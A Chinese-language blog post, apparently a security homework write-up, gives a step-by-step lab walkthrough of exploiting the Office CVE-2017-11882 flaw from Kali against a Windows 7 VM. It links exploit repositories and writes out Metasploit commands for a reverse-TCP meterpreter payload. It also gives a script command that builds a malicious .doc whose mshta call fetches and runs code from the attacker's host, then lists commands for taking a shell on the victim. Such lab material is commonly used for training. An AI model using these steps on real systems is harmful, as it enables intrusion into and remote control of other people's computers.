注:可以在kali中打开此博客,所有的命令行直接拖动即可,无需自己手敲,一方面是为了方便,一方面是防止不留意写错,可能导致前功尽弃。目录
一、下载与设置
1、操作系统下载
【网络与安全|【网络安全作业】office漏洞检测与利用】2、操作系统安装
3、脚本及cve文件下载
4、文件转存
二、操作
1、打开metasploit
2、查找cve模块
3、使用cve模块
4、运行-exploit -j
5、生成恶意doc文件
6、打开文件
7、Kali查看
8、入侵操作
三、注意点
一、下载与设置 1、操作系统下载 我们用到win7及kali操作系统,用win7做目标机,并安装好带有漏洞的office。用kali做攻击机。
2、操作系统安装 安装kali虚拟机。安装教程参考:
https://blog.csdn.net/shuiyixin/article/details/101021285安装win7。
3、脚本及cve文件下载 Python脚本:https://github.com/Ridter/CVE-2017-11882。脚本用于生成恶意文件。
文章图片
cve文件:https://github.com/0x09AL/CVE-2017-11882-metasploit。
文章图片
4、文件转存 把下载的cve_2017_11882.rb文件复制到如下目录:
/usr/share/metasploit-framework/modules/exploits/windows/smb/把下载的cve_2017_11882.rtf放到如下目录:
/usr/share/metasploit-framework/data/exploits/通过命令行可以查看,如下:
文章图片
二、操作 1、打开metasploit 点击metasploit图标打开软件。
文章图片
2、查找cve模块 使用命令查找对应的模块:
search cve_2017_11882
文章图片
3、使用cve模块
文章图片
使用exploit
use exploit/windows/smb/cve_2017_11882首先使用命令设置payload为反弹tcp。
set payload windows/meterpreter/reverse_tcp其次使用命令设置攻击机的ip(可以使用ifconfig查看)。
set lhost 192.168.72.130再使用命令设置URI的路径(注意这里设置的路径test,下面使用python脚本生成doc的时候也要加上这个路径)
set URIPATH test最后检查配置。
show options4、运行-exploit -j
文章图片
5、生成恶意doc文件 在桌面右键打开一个终端,把Command109b_CVE-2017-11882.py复制到桌面,为了方便,可以将文件改个名字cve.py,运行命令python cve.py -c "mshta http://192.168.72.130:8080/test" -o test4.doc生成恶意doc文件。
文章图片
这里要注意:
Python系统自带,无需自己再下载;
http://192.168.0.110:8080/test:是路径。前面的“192.168.72.130”是ip地址,可以通过ifconfig查看;8080是端口,固定的;test是前面设置的URIPATH,前面设置是什么,这里就写什么。
test4是文件名,可以自己设置的。
6、打开文件 复制文件到目标机打开。我复制的方式是使用优盘,从kali虚拟机存到外接优盘,再从外接优盘转存到win7虚拟机
文章图片
注:7、8、是理论操作了,目前没有找到合适的office(有漏洞的版本),所以并没有按照预期得到结果。后面找到了再进行完善。7、Kali查看 返回kali查看,可以看到已经访问通过。
使用命令进行查看。可以看到win7系统的相关信息。
sessions -i
输出命令切换进入win7控制程序。
sessions -i 1
8、入侵操作 通过以上的命令,我们就可以进入到win7系统,输入shell,就可以进入cmd界面,就可以使用cmd命令进行一系列操作。
三、注意点 在实现过程中遇到很多问题,在这里总结:
win7系统不要下载那种可以一键安装的系统,无法用虚拟机打开。
文件的下载等操作一般都是在kali中实现,所以,可以直接将本文在kali中打开。文件直接下载到kali中。
office尽量下载老版本,有漏洞,可以实现该功能。现在网上的一般都是修复后的。
推荐阅读
- 无线安全渗透与防御|WEP-渗透WEP新思路--Hirte
- 汇编----寄存器
- 无线安全渗透与防御|无线渗透-----aircrack-ng破解WEP加密
- ARP攻击
- 无线安全渗透与防御|无线渗透----扫描附近WiFi(windows系统)
- 网络安全|永恒之蓝MS17-010exp复现
- 中职网络安全竞赛题目解析|2022年网络安全国赛内存取证WP
- JAVA|Spring boot和Vue.js实现基于oauth2授权码模式的认证 (一)
- 渗透测试|【文件上传绕过】——后端检测_MIME-TYPE检测漏洞